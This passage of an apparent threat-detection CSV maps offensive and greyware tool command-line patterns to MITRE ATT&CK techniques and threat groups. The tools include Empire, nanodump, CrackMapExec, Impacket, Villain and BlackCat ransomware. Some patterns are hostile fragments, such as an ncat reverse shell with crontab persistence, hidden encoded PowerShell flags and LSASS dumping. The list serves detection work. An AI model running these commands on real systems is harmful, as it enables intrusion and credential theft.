TA0009,N/A,N/A,Defense Evasion,https://github.com/h4wkst3r/InvisibilityCloak,1,0,N/A,N/A,4,375,147,2022-07-22T14:13:53Z,2021-05-19T14:19:49Z -* --name covenant *,offensive_tool_keyword,covenant,Covenant is a collaborative .NET C2 framework for red teamers,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/cobbr/Covenant,1,0,N/A,10,10,3787,732,2023-02-21T23:55:48Z,2019-02-07T15:55:18Z -* nanodump*,offensive_tool_keyword,nanodump,The swiss army knife of 
LSASS dumping. A flexible tool that creates a minidump of the LSASS process.,T1003.001 - T1003.003,TA0006,N/A,N/A,Credential Access,https://github.com/fortra/nanodump,1,0,N/A,N/A,10,1467,208,2023-09-04T01:25:27Z,2021-11-10T18:28:15Z -* nanodump/*,offensive_tool_keyword,nanodump,The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.,T1003.001 - T1003.003,TA0006,N/A,N/A,Credential Access,https://github.com/fortra/nanodump,1,0,N/A,N/A,10,1467,208,2023-09-04T01:25:27Z,2021-11-10T18:28:15Z -* nat-pmp-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* nat-pmp-mapport.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* nbd-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* -NBNSBruteForce*,offensive_tool_keyword,Inveigh,.NET IPv4/IPv6 machine-in-the-middle tool for penetration testers,T1550.002 - T1059.001 - T1071.001,TA0002,N/A,N/A,Sniffing & Spoofing,https://github.com/Kevin-Robertson/Inveigh,1,0,N/A,10,10,2212,441,2023-06-13T01:36:42Z,2015-04-02T18:04:41Z -* nbns-interfaces.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* -NBNSTTL *,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -* nbstat.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* ncat * -e /bin/bash*|crontab*,greyware_tool_keyword,ncat,reverse shell persistence,T1059.004 - T1053.005 - T1059.005,TA0002 - TA0005,N/A,N/A,Persistence,N/A,1,0,greyware_tools high risks of false positives,N/A,N/A,N/A,N/A,N/A,N/A -* ncp-enum-users.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* ncp-serverinfo.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* ndmp-fs-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* ndmp-version.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* --neo4j-host *--neo4j-port*,offensive_tool_keyword,sprayhound,Password spraying tool and Bloodhound integration,T1110.003 - T1210.001 - T1069.002,TA0006 - TA0007 - TA0003,N/A,N/A,Credential Access,https://github.com/Hackndo/sprayhound,1,0,N/A,N/A,2,136,12,2023-02-15T11:26:53Z,2020-02-06T17:45:37Z -* nessus-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* nessus-xmlrpc-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* netbus-auth-bypass.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* netbus-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* netbus-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* netbus-version.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* --netcat-port *,offensive_tool_keyword,Villain,Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).,T1021 - T1043 - T1055 - T1071 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/t3l3machus/Villain,1,0,N/A,10,10,3252,534,2023-08-08T06:24:24Z,2022-10-25T22:02:59Z -* netripper*,offensive_tool_keyword,crackmapexec,crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks,T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002,TA0002 - TA0006 - TA0007,N/A,APT39 - Dragonfly - FIN7 - MuddyWater,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,0,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -* netscan.exe *,greyware_tool_keyword,softperfect networkscanner,SoftPerfect Network Scanner can ping computers scan ports discover shared folders and retrieve practically any information about network devices via WMI SNMP HTTP SSH and PowerShell,T1046 - T1065 - T1135 ,TA0007 ,N/A,N/A,Discovery,https://www.softperfect.com/products/networkscanner/,1,0,N/A,8,10,N/A,N/A,N/A,N/A -* --NewCertPath *.pfx --NewCertPassword *,offensive_tool_keyword,ForgeCert,ForgeCert uses the BouncyCastle C# API and a stolen Certificate Authority (CA) certificate + private key to forge certificates for arbitrary users capable of authentication to Active Directory.,T1553.002 - T1136.003 - T1059.001,TA0006 - TA0002,N/A,N/A,Defense Evasion,https://github.com/GhostPack/ForgeCert,1,0,N/A,10,6,538,87,2022-10-07T18:18:09Z,2021-06-09T22:04:18Z -* NewLocalAdmin(*,offensive_tool_keyword,SharpGPOAbuse,SharpGPOAbuse is a .NET application written in C# that can be used to take advantage of a user's edit rights on a Group Policy Object (GPO) in order to compromise the objects that are controlled by that GPO.,T1546.008 - T1204 - T1134 ,TA0007 - TA0008 - TA0003 - TA0004 ,N/A,N/A,Defense Evasion,https://github.com/FSecureLABS/SharpGPOAbuse,1,0,N/A,N/A,9,855,130,2020-12-15T14:48:31Z,2019-04-01T12:10:25Z -* nexpose-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* nfs-ls.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* nfs-showmount.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* nfs-statfs.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* --nicehash *--coin *,greyware_tool_keyword,xmrig,CPU/GPU cryptominer often used by attackers on compromised machines,T1496 - T1057,TA0004 - TA0007,N/A,N/A,Cryptomining,https://github.com/xmrig/xmrig/,1,0,N/A,9,10,7768,3471,2023-09-29T12:15:29Z,2017-04-15T05:57:53Z -* nikto.pl *,offensive_tool_keyword,nikto,Nikto web server scanner,T1592 - T1592.003,TA0007 - TA0040,N/A,N/A,Web Attacks,https://github.com/sullo/nikto,1,1,N/A,N/A,10,7136,1096,2023-09-18T14:44:28Z,2012-11-24T04:24:29Z -* nimcrypt*,offensive_tool_keyword,nimcrypt,Nimcrypt is a .NET PE Crypter written in Nim based entirely on the work of @byt3bl33d3r's OffensiveNim project,T1027 - T1055 - T1099 - T1140,TA0005 - TA0006 - TA0008,N/A,N/A,Defense Evasion,https://github.com/icyguider/nimcrypt,1,0,N/A,N/A,1,83,5,2021-03-25T00:27:12Z,2021-03-24T17:51:52Z -* Ninja.py*,offensive_tool_keyword,Ninja,Open source C2 server created for stealth red team operations,T1021 - T1043 - T1055 - T1071 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/ahmedkhlief/Ninja,1,0,N/A,10,10,720,166,2022-09-26T16:07:43Z,2020-03-04T14:17:22Z -* nje-node-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* nje-pass-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* --nla-redirection-host * --nla-redirection-port *,offensive_tool_keyword,pyrdp,RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact,T1550.002 - T1059.006 - T1071.001,TA0002 - TA0010,N/A,N/A,Sniffing & Spoofing,https://github.com/GoSecure/pyrdp,1,0,can also be used by blueteam as a honeypot,10,10,1296,235,2023-07-28T14:33:09Z,2018-09-07T19:17:41Z -* nntp-ntlm-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* -NoBase64 *,offensive_tool_keyword,empire,empire agent.ps1 arguments.Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1061,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -* --no-bruteforce *,offensive_tool_keyword,crackmapexec,A swiss army knife for pentesting networks,T1210 T1570 T1021 T1595 T1592 T1589 T1590 ,N/A,N/A,N/A,POST Exploitation tools,https://github.com/byt3bl33d3r/CrackMapExec,1,0,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -* --no-bruteforce --continue-on-success*,offensive_tool_keyword,NetExec,NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.,T1069 - T1021 - T1136 - T1018,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Credential Access,https://github.com/Pennyw0rth/NetExec,1,0,N/A,10,6,525,54,2023-10-03T21:19:24Z,2023-09-08T15:36:00Z -* --no-http-server -smb2support -t * -c *,offensive_tool_keyword,AD exploitation cheat 
sheet,Example command to relay the hash to authenticate as local admin (if the service account has these privileges) and run calc.exe. Omit the -c parameter to attempt a secretsdump instead.,T1550 - T1555 - T1212 - T1558,N/A,N/A,N/A,Exploitation tools,https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* --nomain -d:exportDll --passL:*,offensive_tool_keyword,nimplant,A light-weight first-stage C2 implant written in Nim,T1059-001 - T1027 - T1036,TA0002 - TA0005 - TA0002,N/A,N/A,C2,https://github.com/chvancooten/NimPlant,1,0,N/A,10,10,641,85,2023-08-31T14:52:00Z,2023-02-13T13:42:39Z -* --no-net*,offensive_tool_keyword,blackcat ransomware,BlackCat Ransomware behavior,T1486.001 - T1489 - T1490 - T1486,TA0011 - TA0010 - TA0012 - TA0007 - TA0040,blackcat ransomware,N/A,Ransomware,https://www.sentinelone.com/labs/blackcat-ransomware-highly-configurable-rust-driven-raas-on-the-prowl-for-victims/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* -NoP -sta -NonI -W Hidden -Enc *,offensive_tool_keyword,empire,Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - 
TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/BC-SECURITY/Empire,1,0,N/A,N/A,10,3589,533,2023-09-08T05:50:59Z,2019-08-01T04:22:31Z -* -no-pass -dns-tcp -nameserver*,offensive_tool_keyword,Certipy,Tool for Active Directory Certificate Services enumeration and abuse,T1555 T1588 T1552,N/A,N/A,N/A,Exploitation tools,https://github.com/ly4k/Certipy,1,0,N/A,10,10,1765,243,2023-09-26T00:51:47Z,2021-10-06T23:02:40Z -* -no-pass -just-dc-user *,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,0,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -* -no-pass rid-hijack*,offensive_tool_keyword,wmiexec-pro,The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in lateral movement,T1021.006 - T1560.001,TA0008 - TA0040,N/A,N/A,Network Exploitation tools,https://github.com/XiaoliChan/wmiexec-Pro,1,0,N/A,N/A,8,790,98,2023-07-31T03:58:14Z,2023-04-04T06:24:07Z -* -no-pass -usersfile *,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,0,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -* NoPowerShell.*,offensive_tool_keyword,C2 related tools,PowerShell rebuilt in C# for Red Teaming purposes,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider,C2,https://github.com/bitsadmin/nopowershell,1,0,N/A,10,10,761,126,2021-06-17T12:36:05Z,2018-11-28T21:07:51Z -* No-PowerShell.cs*,offensive_tool_keyword,No-powershell,powershell script to C# (no-powershell),T1059.001 - T1027 - T1500,TA0002 - TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/gtworek/PSBits/blob/master/Misc/No-PowerShell.cs,1,0,N/A,8,10,2669,471,2023-09-28T06:10:58Z,2019-06-29T13:22:36Z -* --no-ppid-spoof*,offensive_tool_keyword,CSExec,An alternative to 
*exec.py from impacket with some builtin tricks,T1059.001 - T1059.005 - T1071.001,TA0002,N/A,N/A,Lateral Movement,https://github.com/Metro-Holografix/CSExec.py,1,0,private github repo,10,,N/A,,, -* -no-preauth * -dc-ip *,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,0,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -* -NoPRo -wIN 1 -nONi -eN Sh33L*,offensive_tool_keyword,venom,venom - C2 shellcode generator/compiler/handler,T1027 - T1055 - T1071 - T1505 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,POST Exploitation tools,https://github.com/r00t-3xp10it/venom,1,0,N/A,N/A,10,1617,584,2023-10-03T22:06:35Z,2016-11-16T10:40:04Z -* --no-prop*,offensive_tool_keyword,blackcat ransomware,BlackCat Ransomware behavior,T1486.001 - T1489 - T1490 - T1486,TA0011 - TA0010 - TA0012 - TA0007 - TA0040,blackcat ransomware,N/A,Ransomware,https://www.sentinelone.com/labs/blackcat-ransomware-highly-configurable-rust-driven-raas-on-the-prowl-for-victims/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* --no-prop-servers*,offensive_tool_keyword,blackcat ransomware,BlackCat Ransomware behavior,T1486.001 - T1489 - T1490 - T1486,TA0011 - TA0010 - TA0012 - TA0007 - TA0040,blackcat ransomware,N/A,Ransomware,https://www.sentinelone.com/labs/blackcat-ransomware-highly-configurable-rust-driven-raas-on-the-prowl-for-victims/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* --no-sigthief*,offensive_tool_keyword,CSExec,An alternative to *exec.py from impacket with some builtin tricks,T1059.001 - T1059.005 - T1071.001,TA0002,N/A,N/A,Lateral Movement,https://github.com/Metro-Holografix/CSExec.py,1,0,private github repo,10,,N/A,,, -* --no-vm-kill*,offensive_tool_keyword,blackcat ransomware,BlackCat Ransomware behavior,T1486.001 - 
T1489 - T1490 - T1486,TA0011 - TA0010 - TA0012 - TA0007 - TA0040,blackcat ransomware,N/A,Ransomware,https://www.sentinelone.com/labs/blackcat-ransomware-highly-configurable-rust-driven-raas-on-the-prowl-for-victims/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* --no-vm-snapshot-kill*,offensive_tool_keyword,blackcat ransomware,BlackCat Ransomware behavior,T1486.001 - T1489 - T1490 - T1486,TA0011 - TA0010 - TA0012 - TA0007 - TA0040,blackcat ransomware,N/A,Ransomware,https://www.sentinelone.com/labs/blackcat-ransomware-highly-configurable-rust-driven-raas-on-the-prowl-for-victims/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* --no-wall*,offensive_tool_keyword,blackcat ransomware,BlackCat Ransomware behavior,T1486.001 - T1489 - T1490 - T1486,TA0011 - TA0010 - TA0012 - TA0007 - TA0040,blackcat ransomware,N/A,Ransomware,https://www.sentinelone.com/labs/blackcat-ransomware-highly-configurable-rust-driven-raas-on-the-prowl-for-victims/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* nping-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* 